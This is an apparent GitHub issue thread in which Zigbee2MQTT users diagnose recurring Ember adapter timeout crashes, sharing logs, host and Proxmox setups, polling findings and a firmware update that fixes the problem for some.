[2024-12-10 17:59:17] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ASH_ERROR_TIMEOUTS. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=226 Len=10].
[2024-12-10 17:59:17] info: 	z2m: Update of 'Hallway - Ceiling' at 52.08%, ≈ 1 minutes remaining
[2024-12-10 17:59:17] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/Hallway - Ceiling', payload '{"brightness":79,"color_mode":"color_temp","color_temp":406,"linkquality":168,"power_on_behavior":null,"state":"OFF","update":{"installed_version":16786182,"latest_version":16786434,"progress":52.08,"remaining":60,"state":"updating"},"update_available":null}'
[2024-12-10 17:59:40] info: 	zh:ember:uart:ash: Port closed.
[2024-12-10 17:59:40] info: 	zh:ember:uart:ash: ======== ASH stopped ========
[2024-12-10 17:59:40] info: 	zh:ember:ezsp: ======== EZSP stopped ========
[2024-12-10 17:59:40] info: 	zh:ember: ======== Ember Adapter Stopped ========
[2024-12-10 17:59:40] error: 	z2m: Adapter disconnected, stopping
[2024-12-10 17:59:40] info: 	z2m:mqtt: MQTT publish: topic 'zigbee2mqtt/bridge/state', payload '{"state":"offline"}'
[2024-12-10 17:59:40] info: 	z2m: Disconnecting from MQTT server
[2024-12-10 17:59:40] info: 	z2m: Stopping zigbee-herdsman...
[2024-12-10 17:59:40] info: 	z2m: Stopped zigbee-herdsman
[2024-12-10 17:59:40] info: 	z2m: Stopped Zigbee2MQTT
`

szwacz, 2024-12-11:
@Nerivec I also did channel scan as you asked (man this is nice tool! :) )
```
Channel 11: •••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-29 dBm]
Channel 12: ••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-40 dBm]
Channel 13: ••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-40 dBm]
Channel 14: •••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-51 dBm]
Channel 15: •••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-21 dBm]
Channel 16: •••••••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-35 dBm]
Channel 17: ••••••••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-34 dBm]
Channel 18: •••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-29 dBm]
Channel 19: ••••••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-36 dBm]
Channel 20: ••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-54 dBm]
Channel 21: •••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-51 dBm]
Channel 22: ••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-46 dBm]
Channel 23: ••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-42 dBm]
Channel 24: •••••••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-35 dBm]
Channel 25: •••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-55 dBm]
Channel 26: •••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙ [-17 dBm]```

My network is on channel 26 (moved there few weeks ago out of desperation).

I also ordered more powerful raspberry and will try run HA with more RAM.

Kuchiru, 2024-12-16:
Im getting this error daily now, switched from a slae.sh stick to the 06M, using channel 25, my own wifi networks are on 1 and 6. Some Neighbors are on 11 but it is not particularly crowded here and these houses are well isolated.

Unfortunately im at a loss on what i can do to improve this, running the latest firmware on the 06M as well.

szwacz, 2024-12-16:
Ok, I can report major improvements. Upgraded from RaspberryPI 3B+ 1GB RAM, to RaspberryPI 4B 4GB RAM.
I saved last 10 000 lines of logs before upgrade and waited 24h for new logs. Did string-search for erros in both files and here are the results.

On old setup (pi3):
`ERROR_WRONG_DIRECTION` - 130 occurances
`ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT` - 19 occurances
`Stopped Zigbee2MQTT` - 18 occurances

New setup (pi4):
`ERROR_WRONG_DIRECTION` - 0 occurances (for some reason this error vanished as well?)
`ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT` - 3 occurances
`Stopped Zigbee2MQTT` - 0 occurances

This is night and day. I don't know if processing power or RAM was the issue, but since I had two identical installations and after upgrade both improved this way I can pretty safely say that if you use Home Assistant with Zigbe2MQTT aim at Pi4 with at least 2 gigs of RAM.

The error `ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUN` still occures sometimes, but is completely managable now.

microneer, 2024-12-18:
@szwacz this is very good to know. I have the same RPi Model 3B+ 1GB hardware and ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT errors every couple of minutes, leading to Zigbee2MQTT restarts. 

It's also running openHAB 4.2, which has become unresponsive for sometimes a minute at a time since installing Z2M and connecting a handful of very talkative routers. Like you, I figured I needed to upgrade.

I considered an RPi 4B or 5B, but for just over half the money I've bought an off-lease HP EliteDesk 800 G3 Mini with 16GB RAM and 256 NVMe. Based on your investigation, I think my hunch that this will at least improve the timeouts might pay off!

Kuchiru, 2024-12-18:
With this in mind i increased the resources available to my z2m VM, it sits in a low resource alpine container.
It had 1 core and 256mb ram which is more than enough according to the resource monitor.

i increased it to 2 cores and 1GB ram, however it still crashed about a day later just like before.

what i’ve done now is increased the ACK timeout delay to 2000, disabled OTA for some devices (these were a bit spammy) and made some changes in the tcp keep alive options in my vm.
As of right now it has exceeded a day in uptime so i am carefully optimistic.

Nerivec, 2024-12-18:
Just a sidenote, but from HA specs sheet, they seem to recommended Pi 4 or above. That would be for home assistant alone, you add add-ons and integrations, every time you increase the requirements a little (not so little for anything AI related).
openHAB being Java based, I'd expect the requirements to be higher still.

Z2M alone should use around 100MB of RAM (likely ~70 in most cases), and a small amount of CPU. It's not quite clear yet what could be essentially resulting in serial interference when the resources become low, but we've had enough reports to confirm it appears to be. [Some work is being done](https://github.com/Koenkk/zigbee-herdsman-converters/pull/8471) to reduce the requirements of Z2M a bit further, but it is already pretty low, so in most cases, the other "resource takers" should be looked at more closely (or the hardware specs indeed).

@Kuchiru can you expand on the exact changes you applied to ACK & TCP? (If you have some before/after logs, that would be great too!) Also, are you running the original core firmware on the 06m, or a esphome firmware?

Kuchiru, 2024-12-18:
Hi @Nerivec,

Im running 2.6.8 dev21 for both logs with the latest dev firmware available for zigbee, 202411xx i believe.

Changes in Z2M config (ACK):
```
advanced:
    ack_timeout: 2000
```

Changes in sysctl for tcp keepalive:
```
net.ipv4.tcp_keepalive_time = 60      # 1 minute of idle time
net.ipv4.tcp_keepalive_intvl = 10     # 10-second interval between probes
net.ipv4.tcp_keepalive_probes = 5     # 5 probes before declaring dead
```

I've attached the logs as well, for the before log i had debug enabled in the hopes of catching something extra, unfortunately i did not.
Not sure if it matters if im using ember drivers but worth a mention.

[after.log](https://github.com/user-attachments/files/18188919/after.log)
[before.log](https://github.com/user-attachments/files/18188920/before.log)

Nerivec, 2024-12-18:
> Changes in Z2M config (ACK):

That setting does not exist (i.e. this does nothing).

I'll take a look at the logs. Thanks 😉

Kuchiru, 2024-12-18:
> > Changes in Z2M config (ACK):
> 
> That setting does not exist (i.e. this does nothing).
> 
> I'll take a look at the logs. Thanks 😉

Good to know, I’ll remove it!

szwacz, 2024-12-19:
> Just a sidenote, but from HA specs sheet, they seem to recommended Pi 4 or above. That would be for home assistant alone, you add add-ons and integrations, every time you increase the requirements a [...]

Yes. I red those guidelines, but I had Pi3 already laying around so just give it a try. The thing is that everything was working fine. Except once in a while cascading crash due to error discussed in this thread happened. Since all troubleshooting materials about zigbee always focus on wifi or other signal interference and firmware updates this is what I was troubleshooting first few weeks. Nothing was telling me that performance bottleneck might be the culprit.

Nerivec, 2024-12-19:
@Kuchiru `NEIGHBOR_STALE` is reported in the `NCP_COUNTERS` log line (which is what the tool I linked uses to build statistics). Unfortunately, it is just a number, no associated devices (would need firmware debugging capabilities for that). The number goes up to almost 30 between 11pm-1am, while the rest of the day, it is near 0. _I've seen much worse numbers in some networks, but I guess the sudden spike bothered me_ 😉

Kuchiru, 2024-12-20:
Yeah it bothers me too, housely activity obviously comes to a halt around midnight but all routers remain powered so im not sure whats happening here. Z2M did crash every morning shortly after we wake up, however, since the TCP changes and disabling OTA requests for some devices it has not crashed and has remained up for about 3 days now.

zachelnet, 2025-01-05:
Hi,

I encountered a similar issue with Zigbee2MQTT as an add-on in Home Assistant running on Proxmox. My solution was to create a new instance and restore my configuration from a backup. After that, Zigbee2MQTT was stable.

I think the issue is comming from Home Assistant Operation System.

microneer, 2025-01-05:
> I considered an RPi 4B or 5B, but for just over half the money I've bought an off-lease HP EliteDesk 800 G3 Mini with 16GB RAM and 256 NVMe. Based on your investigation, I think my hunch that this will at least improve the timeouts might pay off!

Unfortunately, a giant leap in CPU and memory hasn't eliminated my restarts. Despite using only up to 5% of the CPU and 55% of the RAM available to the container (Proxmox), over the past three days I've had 367 restarts. It's very unpredictable: sometimes it goes for hours without any restarts, but on the other hand between 2-3pm on 4 Jan, it restarted 33 times.

The cause has been a mix of these two errors:

`zh:ember:ezsp: ERROR Transaction failure; status=ASH_ERROR_TIMEOUTS. Last Frame: [FRAME: ID=52:"SEND_UNICAST" Seq=146 Len=7].`

and 

`zh:ember:uart:ash: Received ERROR from adapter, with code=ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT.`

I'll try to use Z2M Ember Helper on the log files.

Nerivec, 2025-01-06:
@microneer you said before that you solved it. I assume it then came back? Any particular event that brough it back?
What's your adapter? Which firmware versions did you try?
Can you you a look at [these recent additions in docs](https://www.zigbee2mqtt.io/guide/installation/20_zigbee2mqtt-fails-to-start_crashes-runtime.html#error-regular-crashes-with-timeout-errors-or-failure-to-start-after-the-serial-port-is-opened) regarding Proxmox? Seems the passthrough is subpar, and can cause lots of problems. Try to setup the passthrough more directly as instructed in that paragraph if you can.

microneer, 2025-01-07:
First of all, @Nerivec, I want to sincerely thank you for your ongoing attention to this issue.

> @microneer you said before that you solved it. I assume it then came back? Any particular event that brough it back? 

I said it was *mostly* solved by changing my WiFi channel. But it may have just appeared to be much better, because it now seems the reboots come and go throughout the day. In any event, I've now migrated off my RPi 3 as it looked at the time like moving to gruntier hardware would help things. It's possible that now the x64 virtualised environment is worse, but it's hard to tell.

>What's your adapter? Which firmware versions did you try? 

Sonoff ZBDongle-E. I've only tried 7.4.3.

> Can you you a look at [these recent additions in [...]

Unfortunately I don't think the instructions are applicable to my setup: I only use containers (aka LXC) not VM, the serial port `/dev/ttyACM0` _is_ passed through rather than the USB hardware, and I'm using a fresh install of openHAB which has never used the serial port.

TBH I'm very confused: are these ASH_ERROR_TIMEOUTS and ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT announcing _serial_, or _radio_ issues? Initially we were talking about radio interference, now we're talking about, what, serial buffer overflows? I don't know which area to focus on, and would be grateful if you could please clarify what they mean. [This post on HA](https://github.com/home-assistant/core/issues/132713#issuecomment-2561934520), someone says it's caused by >6s of no response from the dongle - does that sound right? And such a delay could be caused by (very bad) CPU latency... but sounds more like a firmware issue to be honest.

In any event, I've upped the CPU priority and capacity for my Zigbee2MQTT container to see if that helps. The whole Proxmox setup is at 1-2% CPU usage so I don't think Z2M will have been starved of resources, but you never know.

[This person updated to 7.4.4](https://community.home-assistant.io/t/newbie-zigbee2mqtt-errors-after-ha-updtae-zonoff-3-0-plus-e-crc-and-ash-error/768831/22) and it resolved the issue, but later in the same thread, another person had no such luck. I guess I'll try that next.

Nerivec, 2025-01-07:
👍 
There is indeed a lot of feedback on this issue (split in two main threads for Z2M), and several sources.
The way it _should_ work is (assuming the closed source aren't different from open/docs...):
- Timeout 1: 400-800ms (based on previous ACK time)
- Timeout 2: 800-1600ms
- Timeout 3: 1600-2400ms
- Timeout 4: 2400ms
- Timeout 5: 2400ms
- Timeout 6: 2400ms => ERROR

So, it should amount to between 10 and 12 seconds...
_To give a point of reference, a roundtrip between host<>adapter (2 messages) should take anywhere between 10-30ms (in most cases the lower end) in normal circumstances._

> [!TIP]
> You can use the following in the `advanced` section of the Z2M configuration to get the milliseconds in the logs timestamps:
> `timestamp_format: YYYY-MM-DD HH:mm:ss.SSS`

There are several ways this can happen (and most have been represented by different users from what I gathered):
- Something goes wrong with the firmware, and a message gets lost, or takes too long
- Something goes wrong with a transmission, and a message gets lost, or takes too long
- Something goes wrong with the host machine (e.g. sustained CPU spike, bad passthrough), and a message takes too long

_More cases... but you get the gist._

8.1.0 appears to be centered on bugfixing, so hopefully it will improve several areas on the firmware side. Unfortunately, looks like it has a breaking bug around software flow control, so, we will likely have to wait for the next release since a few adapters still use that (which just so happens are the most affected)... 😞

microneer, 2025-01-07:
Thanks for the insights. I would agree that 6s is an extraordinarily long timeout - a message has definitely gone AWOL.

Last night I took out the USB cable and plugged my DongleE straight into the same port. I left it overnight, hoping for the best... 

How wrong I was: Z2M restarted _every 1m 40s_ since then. It takes 34s to start, so the error was getting logged reliably _every 1m 06s after `started!` got logged_. That pattern survived two container reboots this morning too.

Here's where it gets even more bizarre. I put the USB cable back in. It was _21m 40s_ to the first restart. Now it reboots every:
- 1m 40s a lot
- 2m 40s sometimes
- 3m 40s sometimes
- 4m 40s sometimes

It looks like exactly every minute after Z2M starts, something happens, perhaps a message is sent to the coordinator. 6s after that event, there's a chance of a timeout.

So, what happens every minute after `started!` hits the logs?

Nerivec, 2025-01-07:
Can be a lot of things, an automation on your end, some updates from Z2M (like availability depending on config), receiving device updates... could also be something on the host/guest machine, some kind of "heartbeat"-type thing...

Are you sure your passthrough config is "as optimized as it can be".

@Ricc68 can I ask for your insights? My knowledge of proxmox is still nil 😜

Ricc68, 2025-01-11:
Sure @Nerivec.

I have found the hard way that for some reason the Proxmox passthrough of my USB device (ZBDongle-E) tends to stall every now and then.
My suggestion to @microneer to rule out the USB passthrough potential instabilities is to passthrough the serial port rather than the USB device. I have explained how to do it with Proxmox in the [z2m installation guide](https://www.zigbee2mqtt.io/guide/installation/20_zigbee2mqtt-fails-to-start_crashes-runtime.html#error-regular-crashes-with-timeout-errors-or-failure-to-start-after-the-serial-port-is-opened). Also, as you are investigating, don't underestimate the quality of the USB**2** cable (this is not related to Proxmox, but a bad cable gives errors which can confuse the investigation a lot).

Another thing about Proxmox is that I think is worthless to keep resources low.
In my HAOS VM to avoid resources bottlenecks I've set:

- 2GB minimum ram with 4GB maximum ballooning ram (means that it stays at 2GB min and grows up to 4GB on demand but releases it if no more needed, sharing with the host).
- 2 cores
- Serial0: /dev/serial/by-id/usb-ITHEAD_SONOFF_serial_device_etc_etc

With this configuration my z2m in HAOS VM in Proxmox is rock solid.

I've also read that @Kuchiru changed drastically the keepalive timeout (ok this is about TCP, not much about Proxmox):

- net.ipv4.tcp_keepalive_time = 60      # 1 minute of idle time
- net.ipv4.tcp_keepalive_intvl = 10     # 10-second interval between probes
- net.ipv4.tcp_keepalive_probes = 5     # 5 probes before declaring dead

while the Linux defaults (also in Proxmox) are:

- net.ipv4.tcp_keepalive_time = 7200
- net.ipv4.tcp_keepalive_intvl = 75
- net.ipv4.tcp_keepalive_probes = 9

When chatting with the z2m dongle, and this apply over both TCP and serial connection, the chat is very busy so I don't see how changing the TCP keepalive timers may affect the stability of the TCP connection: if there are stalls, they are somewhere else not in the TCP protocol (if you have stalls in the TCP protocol then you've got much worse problems with your network than just z2m not working).
In my opinion changing these settings from the default has the result of injecting unnecessary noise into the network.

To try to avoid stalls I would rather further increase the resources allocated for the VM as 1GB of ram seems quite small to me.
Just for your reference, my HAOS VM in Proxmox is using much more than that and my configuration is not that complicated:

[image]

Of course this wouldn't affect stalls that are located on the Zigbee adapter, which need to be fixed in the adapter itself.

microneer, 2025-01-11:
Thank you for your suggestions @Ricc68. As I noted a few posts above, I'm
already passing through the serial port rather than the USB, I believe so
anyway, and have been extremely generous with RAM and CPU.

@Nevirec I don't think this is interference from the host or guest or
network since the restarts appear at intervals of precisely N minutes + 6s
(the timeout period) from z2m starting. There is not going to be anything
on the host, or guest, that is precisely correlated to minute intervals
after with those restarts. Except z2m itself, or something in the firmware
or network that kicks off every 1m after the coordinator comes up.

My guess is that z2m sends something every 1m that sometimes causes the
firmware to hang. For most of the time for most people it's fine - maybe
there's something on the network like a particular device, or serial
timing, but whatever the reason there's a firmware race condition that
shows up at least in 7.4.3.

I'm going to try different firmware and turning on as much trace level
debugging as possible to find out what happens every 1 minute after (but
not at) z2m startup. I have had a busy weekend though.

Nerivec, 2025-01-11:
> There is not going to be anything on the host, or guest

Depends on setup, if using some kind of monitoring software, it could trigger when Z2M (NodeJS) starts. Though agreed, more of a stretch.

> My guess is that z2m sends something every 1m

Should be easy enough to find this in the debug logs if there is one.

@Ricc68 correct me if I'm wrong, but microneer mentioned the adapter was visible at `/dev/ttyACM0`, if the serial was passed through directly, it would show up as `/dev/ttySx`, right (based on the docs)?

Ricc68, 2025-01-11:
@microneer consider that I'm using firmware 8.0.2 on my ZBDongle-E which was, at least for me, a significant improvement over 7.4.4.
No @Nerivec, he is using an LXC container (sorry @microneer, I have not read that part with enough attention) in Proxmox therefore he is accessing directly the host serial which correctly is ttyACM0 as the host serial is driven by the cdc-acm driver.

microneer, 2025-01-12:
I've got stable operation for 8+ hours now by **disabling polling** of the 4x Tuya TS011F_plug_3's on my network.

I tried this because with debug enabled I noticed in startup four entries like this, corresponding to those Tuya TS011F_plug_3's:
```
[2025-01-12 08:25:53] debug:         zhc:utils: Polling 'measurement' for '0xa4c138f4cacfcae4' at an interval of 60
```
It may be helpful to note that I found three of these messages just before the error is first logged:
```
[2025-01-12 08:26:54] debug:         zh:ember:uart:ash: Timer expired waiting for ACK for frmTx=4, ackRx=3
```

Anyway, so I disabled polling, although I didn't restart. Z2M ran for an hour and a half without the error. After Z2M restarted it ran for over 8 hours before I tried enabling polling again - at which point it errored after 1m 6s. It restarted but only lasted 3m 6s. Then 4m 6s.

I think this is enough evidence to say that disabling polling on those devices has fixed my Z2M restarts.

The strange thing is that the [docs for that device](https://www.zigbee2mqtt.io/devices/TS011F_plug_3.html) say that polling is required because firmware > 1.0.5 doesn't broadcast the power. In my experience - and Z2M says I have firmware 1.0.5 on the devices - they broadcast plenty of updates, much more often than 60s. And polling them leads to disaster.

Possible next steps?
1. Update docs on the TS011F_plug_3 to suggest disabling polling if Z2M restarts 'randomly'.
2. Change the default on those devices so that polling is disabled, change the UI note to that effect, and change the docs on the _plug_3 to match.
3. Investigate whether there is some way to distinguish between these 1.0.5 firmware devices that don't broadcast and so need to be polled, vs. the one I have which does broadcast and shouldn't be polled.
4. Request other sufferers of this problem @Kuchiru @szwacz @rrakso to try disabling polling on Tuya devices to see if it's a general solution.

Nerivec, 2025-01-12:
@microneer can you try out a firmware in https://github.com/Nerivec/silabs-firmware-builder/actions/runs/12734473893
I suspect the source may be the same for all these timeout errors, and seems we're getting positive feedback with increased RX buffer in-firmware...

@Ricc68 if you're up for testing if the old way you had to pass serial through works better on these firmware, I'd be curious to know the result too.

Ricc68, 2025-01-18:
At the moment I don't have much time for this experiment as it requires to reconfigure both proxmox VM and HAOS, maybe in the next few weeks.
Anyway my preference remains passing the serial port instead of the full USB device as it is simpler for the VM and it is well known that simpler things are less likely to break.

tdashmike, 2025-01-21:
2024.6.2-update5 is working much better with my ZBDongle-e on HASS VM running on Proxmox. I tried passing just the serial port, removing the usb extension and changing channels and it didn't seem to be helping at all. Eventually, it would crash z2m. I was using ZBDongle -p before and was hoping it was going to be an easy upgrade but I had this issue and in the beginning z2m wouldn't start because of this error: ```z2m: Error: [BACKUP] Current backup file is not for EmberZNet stack.``` so I had to repair all my devices.

This is the error I was getting before:
```
zh:ember:uart:ash: Received ERROR from adapter, with code=ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT.
zh:ember:uart:ash: ASH disconnected | Adapter status: ASH_NCP_FATAL_ERROR
zh:ember:uart:ash: Error while parsing received frame, status=ASH_NCP_FATAL_ERROR.
zh:ember: Adapter fatal error: HOST_FATAL_ERROR
```

Right now, I am only seeing this info:
```
zh:ember:ezsp: Received network/route error ROUTE_ERROR_MANY_TO_ONE_ROUTE_FAILURE for "21794".
```

microneer, 2025-01-21:
> [@microneer](https://github.com/microneer) can you try out a firmware in https://github.com/Nerivec/silabs-firmware-builder/releases/tag/v2024.6.2-update5 I suspect the source may be the same for [...]

... and .... (drumroll) ... problem solved! 24 hours now without a single restart, including when I enabled polling on 4x devices that actually don't need it (previously I found that this would cause errors almost every minute).

So version 8.0.2 (which is what's linked above) is a solution, or at least a massive improvement.

Like @tdashmike I'm seeing ROUTE_ERROR_MANY_TO_ONE_ROUTE_FAILURE for "nnnnn". Apparently that INFO message doesn't necessarily mean anything is wrong, according to the ever-helpful @Nerivec in  https://github.com/Koenkk/zigbee2mqtt/issues/22516.

Thank you all.

closed 2025-02-06 by Nerivec

jeroenst, 2026-09-09:
I also experience this issue, often after a restart of the docker container of zigbee2mqtt. This was not always a problem but it is since about a year I think. A restart of zigbee2mqtt solves this issue. Unfortunately the watchdog doesn't kick in so I always have to resolve this manually after I find out my lamps are not responding.

```
[2026-09-09 14:44:27] error: 	zh:ember:uart:ash: Received ERROR from adapter, with code=ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT.
[2026-09-09 14:44:27] error: 	zh:ember:uart:ash: ASH disconnected | Adapter status: ASH_NCP_FATAL_ERROR
[2026-09-09 14:44:27] error: 	zh:ember:ezsp: Fatal error, status=ASH_NCP_FATAL_ERROR. Last Frame: [FRAME: ID=38:"GET_EUI64" Seq=34 Len=13]
[2026-09-09 14:44:27] error: 	zh:ember:ezsp: Fatal error, status=ASH_NCP_FATAL_ERROR. Last Frame: [FRAME: ID=38:"GET_EUI64" Seq=34 Len=13]
[2026-09-09 14:44:39] error: 	zh:ember:ezsp: ERROR Transaction failure; status=ASH_ERROR_TIMEOUTS. Last Frame: [FRAME: ID=38:"GET_EUI64" Seq=34 Len=13].
[2026-09-09 14:45:24] warning: 	z2m: Failed to ping 'WallLamp_1' (attempt 1/1, ZCL command 0xa4c138de5853228b/1 genBasic.read(["zclVersion"],
{"timeout":10000,"disableResponse":false,"disableRecovery":true,"disableDefaultResponse":true,"direction":0,"reservedBits":0,"writeUndiv":false,"sendPolicy":"immediate"}) failed (~x~> [ZCL to=0xa4c138de5853228b:7507 apsFrame={"profileId":260,"clusterId":0,"sourceEndpoint":1,"destinationEndpoint":1,"options":4416,"groupId":0,"sequence":0}] Failed to send request with status=NETWORK_DOWN.))
```

insanemal, 2026-10-09:
This is frustrating. I have this dongle that was working fine on an earlier version of the firmware and software. 

I was rebuilding everything from scratch so I updated the firmware on the dongle and built a new OS image with the latest version of zigbee2mqtt (standalone). And it just gives
`zh:ember:uart:ash: Received ERROR from adapter, with code=ERROR_EXCEEDED_MAXIMUM_ACK_TIMEOUT_COUNT`
every time. 

I've tried plugging it back into the previously working machine, with this and the previous firmware versions. It now doesn't even work in the old setup that was literally running when I started. 

I've built VM's I've tried 3 different physical hosts. I've tried R-Pi's, NUC's everything. 

I've no idea what is causing this error... None. And no way to get any clues where to even begin looking.